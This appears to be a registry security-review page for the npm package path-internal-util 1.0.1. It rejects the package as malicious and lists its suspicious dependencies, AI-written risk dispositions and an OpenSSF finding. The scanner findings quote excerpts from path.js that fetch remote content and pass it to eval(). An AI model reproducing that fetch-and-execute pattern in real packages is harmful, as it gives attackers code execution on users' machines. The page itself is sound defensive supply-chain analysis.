path-internal-util @1.0.1

rejected
This version was rejected. It did not pass GreenFlagged's security review and is not served by the registry. The findings and risk dispositions below explain why.
Risk Score: 100
License: ISC
Install Scripts: No
Dependencies: 7
Dev Dependencies: 0
Package Size: 5.5 KB
Published

Node.js path module

Maintainers

domingopeck

Dependencies (7)

Package   Constraint        Registry Status
fs        ^0.0.1-security   auto_approved
path      ^0.12.7           auto_approved
util      ^0.10.3           auto_approved
axios     ^1.4.0            auto_approved
execp     ^0.0.1            auto_approved
process   ^0.11.1           auto_approved
request   ^2.88.2           No greenflagged match

Transitive Dependency Tree

33 transitive deps, max depth 6
  ├─ axios ^1.4.0 → 1.16.0
  ├─ execp ^0.0.1 → 0.0.1
  ├─ fs ^0.0.1-security → 0.0.1-security
  ├─ path ^0.12.7 → 0.12.7
  ├─ process ^0.11.1 → 0.11.10
  ├─ request ^2.88.2
  ├─ util ^0.10.3 → 0.10.4
  ├─ follow-redirects ^1.16.0 → 1.16.0
  ├─ form-data ^4.0.5 → 4.0.5
  ├─ inherits 2.0.3 → 2.0.3
  ├─ lodash ^4.13.1 → 4.18.1
  ├─ process ^0.11.1 → 0.11.10
  ├─ proxy-from-env ^2.1.0 → 2.1.0
  ├─ util ^0.10.3 → 0.10.4
  ├─ asynckit ^0.4.0
  ├─ combined-stream ^1.0.8 → 1.0.8
  ├─ es-set-tostringtag ^2.1.0 → 2.1.0
  ├─ hasown ^2.0.2 → 2.0.4
  ├─ inherits 2.0.3 → 2.0.3
  ├─ mime-types ^2.1.12 → 2.1.35
  ├─ delayed-stream ~1.0.0 → 1.0.0
  ├─ es-errors ^1.3.0 → 1.3.0
  ├─ function-bind ^1.1.2 → 1.1.2
  ├─ get-intrinsic ^1.2.6 → 1.3.1
  ├─ has-tostringtag ^1.0.2 → 1.0.2
  ├─ hasown ^2.0.2 → 2.0.4
  ├─ mime-db 1.52.0
  ├─ async-function ^1.0.0
  ├─ async-generator-function ^1.0.0 → 1.0.0
  ├─ call-bind-apply-helpers ^1.0.2 → 1.0.2
  ├─ es-define-property ^1.0.1 → 1.0.1
  ├─ es-errors ^1.3.0 → 1.3.0
  ├─ es-object-atoms ^1.1.1 → 1.1.2
  ├─ function-bind ^1.1.2 → 1.1.2
  ├─ generator-function ^2.0.0 → 2.0.1
  ├─ get-proto ^1.0.1
  ├─ gopd ^1.2.0 → 1.2.0
  ├─ has-symbols ^1.0.3 → 1.1.0
  ├─ has-symbols ^1.1.0 → 1.1.0
  ├─ hasown ^2.0.2 → 2.0.4
  ├─ math-intrinsics ^1.1.0 → 1.1.0
  ├─ es-errors ^1.3.0 → 1.3.0
  ├─ function-bind ^1.1.2 → 1.1.2

Risk Dispositions (3 applicable to this version, 0 other)

Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.

Rule | Source | Disposition | Author | Reason
semgrep:eval-usage | semgrep | reject | AI | AI (semgrep): eval() on remotely-fetched content is RCE; not a false positive for this package.
unvetted-dep:execp | dependencies | reject | AI | AI (dependencies): Suspicious dependency in a malicious package; generalizes across versions.
unvetted-dep:request | dependencies | reject | AI | AI (dependencies): Used to fetch remote payload for eval; malicious pattern generalizes.

SAST Findings (6)

CRITICAL Unvetted dependency: execp dependencies

[Always reject] Version constraint: ^0.0.1.

CRITICAL Unvetted dependency: request dependencies

[Always reject] Version constraint: ^2.88.2.

CRITICAL MAL-2026-3312: Malicious code in path-internal-util (npm) osv

Source: ossf-package-analysis (db91c8a40ff204e2aa98c594413d69b624d93a4ac51ea09fc00b1d3f63b8e462)

The OpenSSF Package Analysis project identified 'path-internal-util' @ 1.0.1 (npm) as malicious. It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.

CRITICAL eval-usage: path.js:556 semgrep

[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source.

    554 |   .then((data) => {
    555 |     const codeString = data.content;
  > 556 |     eval(codeString);
    557 |   })
    558 |   .catch((t) => console.error("Error fetching or executing code:", t));

CRITICAL eval-usage: path.js:566 semgrep

[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source.

    564 |   .then((data) => {
    565 |     const codeString = data.content;
  > 566 |     eval(codeString);
    567 |   })
    568 |   .catch((t) => console.error("Error fetching or executing code:", t));

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

Review Summary

Risk score: 100 (capped from 221). Findings: 5 critical (+200), 7 low (+21).

Published to npm: